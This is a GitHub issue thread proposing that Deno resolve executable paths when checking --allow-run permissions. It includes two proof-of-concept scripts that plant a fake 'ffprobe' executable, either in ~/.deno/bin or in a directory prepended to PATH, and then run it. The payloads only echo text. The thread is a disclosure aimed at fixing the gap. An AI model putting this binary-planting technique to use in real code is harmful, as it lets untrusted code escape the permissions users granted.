### ISSUE TITLE
Proposal: resolve executable paths in Deno.run for more fine grained allow-run permissions

### ISSUE THREAD

**Issue by andykais** [denoland/deno#14122]
## The security flaw

consider two malicious scripts. They could be published by a malicious library author, or possibly man-in-the-middle'd while installing/upgrading a deno script:

<details>

<summary>malicious-lib1.ts</summary>

```ts
// deno run --allow-env=HOME --allow-run=ffprobe --allow-write malicious-lib1.ts
import * as path  from 'https://deno.land/std/path/mod.ts'
import { writeAll } from "https://deno.land/std/streams/conversion.ts";


const malicious_ffprobe = `
#!/bin/bash

echo "I can do whatever I please."
`

// find an executable path with non-sudo permissions
const known_executable_dir = path.join(Deno.env.get('HOME')!, '.deno/bin')
const filepath = path.join(known_executable_dir, 'ffprobe')
const file = await Deno.open(filepath, { createNew: true, write: true, mode: 0o755 })
  .catch(e => {
    if (e instanceof Deno.errors.AlreadyExists) return Deno.open(filepath, { write: true })
    else throw e
  })
await Deno.truncate(filepath, 0)
await Deno.writeAll(file, new TextEncoder().encode(malicious_ffprobe))
Deno.close(file.rid);

// we now have access to an executable that does whatever we want
const proc = Deno.run({ cmd: ['ffprobe'] })
await proc.status()
```
</details>

<details>

<summary>malicious-lib2.ts</summary>

```ts
// deno run --allow-env=PATH --allow-run=ffprobe --allow-write=.
import * as path  from 'https://deno.land/std/path/mod.ts'
import { writeAll } from "https://deno.land/std/streams/conversion.ts";


const malicious_ffprobe = `
#!/bin/bash

echo "I can do anything I want."
`

// modify the PATH envar to include our local executables folder we will be making
Deno.env.set('PATH', '.local-executables:' + Deno.env.get('PATH'))
await Deno.mkdir('.local-executables', {recursive:true})
const filepath = path.join('.local-executables', 'ffprobe')
const file = await Deno.open(filepath, { createNew: true, write: true, mode: 0o755 })
  .catch(e => {
    if (e instanceof Deno.errors.AlreadyExists) return Deno.open(filepath, { write: true })
    else throw e
  })
await Deno.truncate(filepath, 0)
await Deno.writeAll(file, new TextEncoder().encode(malicious_ffprobe))
Deno.close(file.rid);

// we now have access to an executable that does whatever we want
const proc = Deno.run({ cmd: ['ffprobe'] })
await proc.status()
```

</details>

The first script works by writing a malicious executable into a known executable dir (that doesnt require elevated permissions to write to). The second script works by adding a new directory to the `PATH` environment, which deno reads directly from to determine where an executable originates. In either case, we give the library some pretty inconspicuous permissions:
- `deno run --allow-env=HOME --allow-run=ffprobe --allow-write` (`--allow-env=HOME` isnt even technically necessary)
- `deno run --allow-env=PATH --allow-run=ffprobe --allow-write=.`

## Possible workarounds

They both take advantage of the fact that an executable can be resolved from several locations along the `PATH` envar. To remedy this, I could specify the _exact_ location of an executable that I am allowing access to in my deno run command. However, the library author (who is not writing malicious code!) cant exactly write portable code to help with that:
```ts
// How can I be sure this is in the same location cross platform?
// How can I be sure a user doesnt have a custom location for this executable?
const proc = Deno.run({ cmd: ['/usr/local/bin/ffprobe'] })
await proc.status()
```

## Proposed solution

So, I am proposing that permissions on executables can be resolved before checking if they match the allowed permissions. E.g.
```bash
deno run --allow-run=/usr/local/bin/ffprobe
```
and the following code should work:
```ts
// ffprobe is checked against the allow-run permissions as both ffprobe _and_ what the path resolves it to (e.g. /usr/local/bin/ffprobe)
const proc = Deno.run({ cmd: ['ffprobe'] })
await proc.status()
```

### [additional info]
I just picked `ffprobe` at random as an example, any executable could be used here. This just happens to be one that I use in deno occasionally, and wouldn't really be considered a security issue if a readme says to allow it.

**Comment by nayeemrmn** [comment]
A lot of the structural work is there already, the allowlist supports separate `Name("ffprobe")` and `Path("/usr/local/bin/ffprobe")` variants. But currently the two are in entirely separate baskets.

> and the following code should work:
> 
> ```ts
> // ffprobe is checked against the allow-run permissions as both ffprobe _and_ what the path resolves it to (e.g. /usr/local/bin/ffprobe)
> const proc = Deno.run({ cmd: ['ffprobe'] })
> await proc.status()
> ```

To allow this example we can extend `UnaryPermission<RunDescriptor>::query("ffprobe")` to, after first checking for `Name("ffprobe")` in the allowlist, additionally check for `Path(resolve_exe_path("ffprobe"))`.

**Comment by andykais** [comment]
this issue should not be closed while there is an open pull request addressing it. If that pr gets closed as well, I could see this being marked stale/closed being ok

**Comment by andykais** [comment]
should this stay closed? There is still an open pull request with a pending review from @dsherret
